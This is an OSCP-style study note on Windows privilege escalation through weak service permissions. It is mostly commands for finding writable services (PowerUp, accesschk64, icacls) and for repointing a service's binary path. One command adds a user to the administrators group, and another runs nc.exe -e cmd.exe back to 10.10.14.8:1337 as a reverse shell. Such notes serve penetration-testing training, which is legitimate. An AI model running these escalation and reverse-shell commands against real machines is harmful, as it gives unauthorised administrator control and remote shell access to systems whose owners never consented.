// notes/ PrivEsc — Windows
🪟
Service Permissions Binary Paths
Services sometimes have executables attached to them. If we have the right permissions to the service then we can change the binary path (executable file) to a malicious one.
#windows privilege escalation#adot8
source · oscp.adot8.com · windows-privilege-escalation/service-permissions_binary-paths ↗Binary Paths
Overview
Services sometimes have executables attached to them. If we have the right permissions to the service then we can change the binary path (executable file) to a malicious one.
Exploitation via Powershell
View services
code
01Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}View permissions
code
01icacls "C:\xampp\apache\bin\mysqld.exe"Replace service binary with malicious one then restart service
code
01Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'}02net stop mysql03net start mysql04shutdown /r /t 0Exploitation using PowerUp
Run PowerUp on machine
powerquery
01. .\PowerUp.ps102Invoke-AllChecksChange the binary path
powerquery
01sc.exe config daclsvc binpath= "net localgroup administrators Greg /add"02sc.exe config daclsvc binpath= "C:\temp\nc.exe -e cmd.exe 10.10.14.8 1337" Start service
powerquery
01sc.exe start dacl Exploitation via Accesschk64
Check for services with write permissions
code
01accesschk64.exe --accept-eula -uwcv Everyone *code
01accesschk64.exe -uwcv daclsvcQuery the service
powerquery
01sc qc daclsvc